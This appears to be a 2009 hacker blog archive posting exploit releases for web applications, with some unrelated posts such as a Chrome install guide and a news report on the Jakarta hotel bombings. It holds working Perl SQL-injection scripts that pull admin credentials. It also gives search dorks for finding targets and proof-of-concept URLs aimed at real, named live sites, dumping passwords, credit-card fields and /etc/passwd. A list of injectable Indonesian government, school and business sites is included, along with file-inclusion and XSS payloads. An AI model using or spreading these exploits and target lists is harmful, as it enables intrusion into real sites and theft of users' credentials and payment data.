# [o] Greetz
#      MainHack BrotherHood [ http://mainhack.net ]
#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe
#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
#
#==========================================================================================#

use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'crotz';
$vuln   = 'browse.php?id=';
$table  = 'admin';
$column = 'password';
$regexp = "No links for this category could be found";
$maxlen = 32;

my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }

printf "\n
                           $cmsapp
[x]============================================================[x]
| Ed Charkows Supercharged Linking Blind SQL Injection Exploit |
|              [F]ound by NoGe [C]oded by Vrs-hCk              |
[x]============================================================[x]

\n";

print "\n [+] URL Path : "; chomp($web=);
print " [+] Valid ID : "; chomp($id=);

if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }

print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";

sub get_data() {
print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
syswrite(STDOUT, " [+] md5\@password> ", 20);
for (my $i=1; $i<=$maxlen; $i++) {   my $chr = 0;   my $found = 0;   my $char = 48;   while (!$chr && $char<=57) {    if(exploit($i,$char) !~ /$regexp/) {     $chr = 1;     $found = 1;     syswrite(STDOUT,chr($char),1);    } else { $found = 0; }    $char++;   }   if(!$chr) {    $char = 97;    while(!$chr && $char<=122) {     if(exploit($i,$char) !~ /$regexp/) {      $chr = 1;      $found = 1;      syswrite(STDOUT,chr($char),1);     } else { $found = 0; }     $char++;    }   }   if (!$found) {    print "\n\n [!] Exploit completed.\n\n";    exit;   }  } }  sub exploit() {  my $limit = $_[0];  my $chars = $_[1];  my $blind = '+and+substring((select+'.$column.'+from+'.$table.'+limit+0,1),'.$limit.',1)=char('.$chars.')';  my $inject = $target.$vuln.$id.$blind;  my $content = get_content($inject);  return $content; }  sub get_content() {  my $url = $_[0];  my $req = HTTP::Request->new(GET => $url);
my $ua  = LWP::UserAgent->new();
$ua->timeout(5);
my $res = $ua->request($req);
if ($res->is_error){
print "\n\n [!] Error, ".$res->status_line.".\n\n";
exit;
}
return $res->content;
}

AJ Auction Pro OOPD 2.x SQL Injection Exploit

2009-08-17T01:50:00.004+07:00

#!/usr/bin/perl

#********************************************************#
#
# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit
#      Software : AJ Auction Pro OOPD 2.x
#      Vendor   : http://www.ajsquare.com/
#      Author   : NoGe
#      Contact  : noge[dot]code[at]gmail[dot]com
#      Blog     : http://evilc0de.blogspot.com
#
# [o] Usage
#      root@noge:~# perl ajpro.pl www.target.com
#
# [o] Dork
#      "Powered By AJ Auction Pro"
#
# [o] Greetz
#      MainHack BrotherHood [ http://mainhack.net ]
#      Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang aJe
#      H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
# 
#********************************************************#

use HTTP::Request;
use LWP::UserAgent;

my $target = $ARGV[0];
my $file_vuln = '/store.php?id=';
my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';
print "\n[x]===============================================[x]\n";
print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";
print "[x]                [C]oded By NoGe                [x]\n";
print "[x]===============================================[x]\n\n";

my $exploit = "http://".$target.$file_vuln.$sql_query;

my $request   = HTTP::Request->new(GET=>$exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);
if ($response->is_success) {
my $res   = $response->content;
if ($res =~ m/:(.*):(.*):/g) {
my ($username,$password) = ($1,$2);
print "[+] $username:$password \n\n";
}
else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, ".$response->status_line."\n\n"; }

BrooWaha Engine 2.0.71 SQL Injection Vuln

2009-08-16T00:26:00.004+07:00


[o] BrooWaha Engine 2.0.71 SQL Injection Vulnerability
Software : BrooWaha Engine 2.0.71
Vendor   : http://www.broowaha.com/
Author   : NoGe

[o] Vulnerable file
image.php

[o] Exploit
http://localhost/[path]/image.php?id==[SQL]

[o] Proof of concept
http://london.broowaha.com/image.php?id=-5851+AND+1=2+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),1/*

[o] Dork
"Powered by BrooWaha Engine"

[o] Note
if you dont see the result, view the page source and you will see it. :)
the result from the example above will be like this after you view the page source.
4.0.27-max-log:db162098511:dbo162098511@74.208.16.88/-5851
this is a private script and all target are in one IP address.

Indonesian Vuln Sites [ part four ]

2009-08-13T11:30:00.008+07:00


http://stabmaitreyawira.ac.id/news_detail.php?id=-2+union+select+1,2,3,4,group_concat(username,0x3a,password),6+from+user--

http://www.nganjukkab.go.id/ina/pariwisata/event.php?id=-1+union+select+1,2,3,group_concat(loginname,0x3a,password),5,6,7,8+from+portaluser--

http://www.quindo.co.id/english/event.php?id=-2+union+select+1,database(),3,group_concat(username,0x3a,password),5,6,7,8,9,10,11+from+admin--

http://www.stmikpontianak.ac.id/event.php?id=-24+union+select+1,2,database(),4,version(),6,7,8,9--

http://www.imjakarta.com/olympic/detail/info.php?id=-12+union+select+1,database(),group_concat(auto_id,0x3a,aid,0x3a,password),4+from+ms_admin--

http://www.direktori-perdamaian.org/ina/event.php?id=-14+union+select+user(),database(),version()--

http://www.oasislestari.com/event.php?id=-167+union+select+1,2,group_concat(userid,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+tbadmin--

http://www.an.tv/s/?sid=4+AND+1=2+UNION+SELECT+concat(user,0x3a,password),1+FROM+mysql.user/*

http://www.an.tv/s/?sid=4+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764),1/*

http://sap.gunadarma.ac.id/index.php?stateid=search&substep=detailkul&id=-1136+union+select+1,2,3,unhex(hex(@@version)),5,6,7--

http://www.indonesianeyes.com/news.php?id=-59+union+select+1,user(),version(),4,5,6--

http://www.aptik.or.id/news.php?session=details&newsID=-20060705103857+union+select+1,group_concat(email,0x3a,password),3,4,5,6,7,8,9+from+admin--

http://ia-smandu.org/berita.php?id=-14%20union+select+1,version(),database(),user(),5,6--

http://www.pustakabersama.net/buku.php?id=37357+AND+1=2+UNION+SELECT+0,1,version(),3,4,5,6--

http://www.inixindojogja.com/detailnews.php?id=-127+union+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8+from+admin--

http://balidiscoveryconsulting.com/detailNews.php?id=-3+union+select+1,2,version(),4--

http://kickandy.com/sendfriend.php?ar_id=-1527+union+select+1,2,database(),group_concat(User_Name,0x3a,User_Password),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tbl_user--

http://www.kkppi.go.id/baru/job.php?mode=baca&catinfo_id=-2+union+select+1,2,3,4,group_concat(Login_name,0x3a,Password,0x3a,Email),6,7,8,9,10+from+tb_user--

http://pksm.mercubuana.ac.id/new/news.php?mode=baca&news_id=28+AND+1=2+UNION+SELECT+0,1,2,load_file(0x2f6574632f706173737764),4,5,6,7/*

http://ikatanbankir.com/ibi/news.php?id=-11+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8+from+user--

http://total-ban.promedia-int.com/total/article.php?id=-3+union+select+1,database(),3,group_concat(username,0x3a,password),5,6,7,8+from+user--

http://maknyoess.com/web/news.php?id=-24+union+select+1,user(),3,group_concat(username,0x3a,password),5,6,7,8+from+user--

http://www.bli-online.com/bli/index.php?go=news.detail&idnews=-865+union+select+1,2,3,4,5,database(),7,group_concat(username,0x3a,password),9,10,11,12+from+td_users--

http://www.earthhour.wwf.or.id/news_detail.php?id=25+AND+1=2+UNION+SELECT+0,group_concat(username,0x3a,password),2,3,4+from+user/*

http://www.sonymusic.co.id/album81.php?id=-840+union+select+1,2,3,version(),5,6,7,8,9,10,11,12--

http://nexian.co.id/product.php?p=cdma&t=6+AND+1=2+UNION+SELECT+0,1,2,concat_ws(0x3a,user_id,username,password,lastlogin),4,5,6,7,8+from+users--

http://www.ernijulia.com/v4/buku.php?id=-16+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+admin--

How to install Google Chrome on ubuntu

2009-08-06T03:12:00.003+07:00


this is the Codeweavers CrossOver chrome package which will do for now
until a native linux version is released!

download one of the ubuntu versions that applies to you

CrossOver Chromium Ubuntu and Debian [32 bit]
CrossOver Chromium Ubuntu and Debian [64 bit]

after download it, double click the deb file.
click Install Package.
fill in your sudo password.

to open it go here..
Applications >> CrossOver Chromium >> Chromium

you can download CrossOver Chromium for another distro too..

CrossOver Chromium Red Hat, Mandriva and SUSE
CrossOver Chromium for all other linux distros

osCommerce SQL Injection Vuln

2009-08-05T22:31:00.003+07:00


[o] osCommerce SQL Injection Vulnerability
Software : osCommerce
Vendor   : http://www.oscommerce.com/
Download : http://www.oscommerce.com/solutions/downloads/
Author   : NoGe

[o] Vulnerable file
links.php

[o] Exploit
http://localhost/[path]/links.php?link_id==[SQL]

[o] Proof of concept
http://www.sportmueller-pocking.de/catalog/links.php?link_id=12661+AND+1=2+UNION+SELECT+0,1,group_concat%28cc_type,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires%29,3,4,5,6,7,8+from+orders/*

[o] Dork
"Powered by osCommerce"

[o] Note
i dont know which version of this osCommerce but its vulnerable.
target not to much so i think this is an old version.

linkSpheric 0.74 Beta 6 SQL Injection Vuln

2009-07-30T05:13:00.002+07:00


[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor   : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author   : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln

2009-07-30T05:09:00.003+07:00


[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion Vulnerability
Software : MAXcms - Databay Content Management System version 3.11.20b
Vendor   : http://www.databay.de
Download : http://downloads.sourceforge.net/micro-cms/microcms.zip
Author   : NoGe

[o] Vulnerable file
is_projectPath parameter
includes/InstantSite/inc.is_root.php

GLOBALS[thCMS_root] parameter
classes/class.Tree.php
includes/inc.thcms_admin_mediamanager.php
modul/mod.rssreader.php

is_path parameter
classes/class.tasklist.php
classes/class.thcms.php
classes/class.thcms_content.php
classes/class.thcms_modul_parent.php
classes/class.thcms_page.php
classes/class.thcsm_user.php
includes/InstantSite/class.Tree.php

thCMS_root parameter
classes/class.thcms_modul.php
includes/inc.page_edit_tasklist.php
includes/inc.thcms_admin_overview_backup.php
includes/inc.thcms_edit_content.php
modul/class.thcms_modul_parent_xml.php
modul/mod.cmstranslator.php
modul/mod.download.php
modul/mod.faq.php
modul/mod.guestbook.php
modul/mod.html.php
modul/mod.menu.php
modul/mod.news.php
modul/mod.newsticker.php
modul/mod.rss.php
modul/mod.search.php
modul/mod.sendtofriend.php
modul/mod.sitemap.php
modul/mod.tagdoc.php
modul/mod.template.php
modul/mod.test.php
modul/mod.text.php
modul/mod.upload.php
modul/mod.users.php

[o] Exploit
http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]
http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]
http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de]
http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de]

Bypass Mikrotik Router

2009-07-29T18:05:00.000+07:00


sedikit tutorial tentang gimana bypass Mikrotik Router.

download videonya disini

thx to bob :)

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vuln

2009-07-29T03:28:00.001+07:00


[o] Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability
Software : Ultrize TimeSheet version 1.2.2
Vendor   : http://www.ultrize.com/
Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
Author   : NoGe

[o] Vulnerable file
include($config['include_dir'].'timesheet.class.php');
include/timesheet.php

[o] Exploit
http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]

Now YOu Know eChiropractic Local File Inclusion Vuln

2009-07-29T01:29:00.001+07:00


[o] Now YOu Know eChiropractic Local File Inclusion Vulnerability
Software : Now YOu Know eChiropractic
Vendor   : http://www.echiropractic.net/ - http://www.nowyouknow.net/
Author   : NoGe

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?file=[LFI]

[o] Proof of concept
http://www.nowyouknow.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd
http://www.braile.net/index.php?file=../../../../../../../../../../../../../../../etc/passwd

[o] Dork
"Now You Know Inc"

[o] Notes
this is a private script. many targets are in one IP address.

Basilic 1.5.13 SQL Injection Vuln

2009-07-24T21:54:00.003+07:00


[o] Basilic 1.5.13 SQL Injection Vulnerability
Software : Basilic version 1.5.13
Vendor   : http://artis.imag.fr/Software/Basilic/
Download : http://artis.imag.fr/Software/Basilic/basilic-1.5.13.tar.gz
Author   : NoGe


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?idAuthor=[SQL]


[o] Proof of concept
http://secure.ntsg.umt.edu/publications/index.php?idAuthor=-31+union+select+1,version()--
http://www.iarc.uaf.edu/publications/index.php?idAuthor=-19+union+select+1,version()--


[o] Dork
"Powered by Basilic"

e107 Plugin my_gallery 2.4.1 readfile() LFD Exploit

2009-07-24T10:17:00.004+07:00


[o] e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit

see the exploit in link below
http://milw0rm.com/exploits/9235


[o] Dork

"e107_plugins/my_gallery"


./NoGe

MiniCWB 2.3.0 Multiple RFI Vuln

2009-07-21T09:16:00.003+07:00


[o] MiniCWB 2.3.0 Multiple Remote File Inclusion Vulnerability
Software     : MiniCWB version 2.3.0
Vendor       : http://www.grafxsoftware.com/
Download : http://www.grafxsoftware.com/login.php?action=form&url=download.php
Author      : NoGe


[o] Vulnerable file
include($LANG.".extra.php");
language/en.inc.php
language/hu.inc.php
language/no.inc.php
language/ro.inc.php
language/ru.inc.php


[o] Exploit
http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]


[o] Dork
"Powered by MiniCWB"

Jakarta Explosion, Friday July 17 2009

2009-07-17T13:52:00.008+07:00


Bombs minutes apart ripped through two luxury hotels in Jakarta.
the blasts at the J.W. Marriott and Ritz-Carlton
hotels, located side-by-side in an upscale business district in the
capital, blew out windows and scattered debris and glass across the
street, kicking up a thick plume of smoke. Facades of both hotels were
reduced to twisted metal.



The Marriott, which was attacked in 2003 in a bombing blamed on
Southeast Asian terror network Jemaah Islamiyah,
was hit first, followed by the blast at the Ritz two minutes later. The
attacks came just two weeks after presidential vote expected to
re-elect incumbent Susilo Bambang Yudhoyono who has been
credited with stabilizing a nation previously wracked by militancy.



Local media reported that two people were killed in another explosion
in a car north Jakarta later Friday. Officials confirmed a blast but
said it did not appear to be related.



English football club Manchester United have cancelled their tour match
in Jakarta after bomb explosions in the Indonesian capital
Bombs exploded at the Jakarta Marriott and Ritz-Carlton, which was to
host the Manchester United squad for four days from Saturday evening.

The team was scheduled to play Indonesia Super League XI in an
exhibition match in Jakarta Monday. The match was a part of Manchester
United summer tour. They will arrive in Kuala Lumpur late Friday night
to play a tour match against Malaysian XI at the Bukit Jalil Stadium.

After Jakarta, they were scheduled to fly to Seoul Wednesday before
concluding their four-stop trip in Hangzhou, China, next weekend. But
now with the cancellation of Jakarta trip the tour is set for big
changes.

The Daily Telegraph reported that Manchester United officials reviewed
the team's security situation and have decided to cancel the trip to
Jakarta as a result of the terrorist attacks.

"Following the explosions in Jakarta, one of which at the hotel the
team were due to stay in, and based on advice received, the directors
have informed the Indonesia FA that the club can not fulfil the fixture
in Jakarta on the 2009 Asian Tour," United said in a statement.

dB Masters Multimedia's Content Manager 4.5 SQL Injection Vuln

2009-07-16T21:51:00.001+07:00


[o] dB Masters Multimedia's Content Manager 4.5 SQL Injection Vulnerability
Software : dB Masters Multimedia's Content Manager version 4.5
Vendor   : http://www.dbmasters.net/
Author   : NoGe


[o] Vulnerable file
index.php


[o] Exploit
http://localhost/[path]/index.php?n=xx&id=[SQL]


[o] Proof of Concept
http://www.fosada.za.org/index.php?n=62&id=-57+union+select+1,version()--
http://www.colourmebeautiful.com.au/index.php?n=1&id=-1+union+select+1,version()--


[o] Dork
"Powered by dB Masters Multimedia's Content Manager"

OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vuln

2009-07-16T21:44:00.003+07:00


[o] OnePound Shop 1.x Blind SQL Injection & Cross Site Scripting Vulnerability
Software : OnePound Shop version 1.x
Vendor   : http://www.onepound.cn/
Author   : NoGe


[o] Vulnerable file
productsview.php
categories.php


[o] Exploit
http://localhost/[path]/productsview.php?id=xx&proid=[SQL]
http://localhost/[path]/productsview.php?id=xx&proid=[XSS]
http://localhost/[path]/categories.php?pid=[XSS]


[o] Proof of Concept
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=5
http://www.tele-way.com/productsview.php?id=87&proid=129+and+substring(@@version,1,1)=4
http://www.tele-way.com/productsview.php?id=87&proid=[XSS]
http://tonysbridal.net/categories.php?pid=[XSS]
http://vendorhotspot.com/categories.php?pid=[XSS]


[o] Dork
"Powered by OnePound"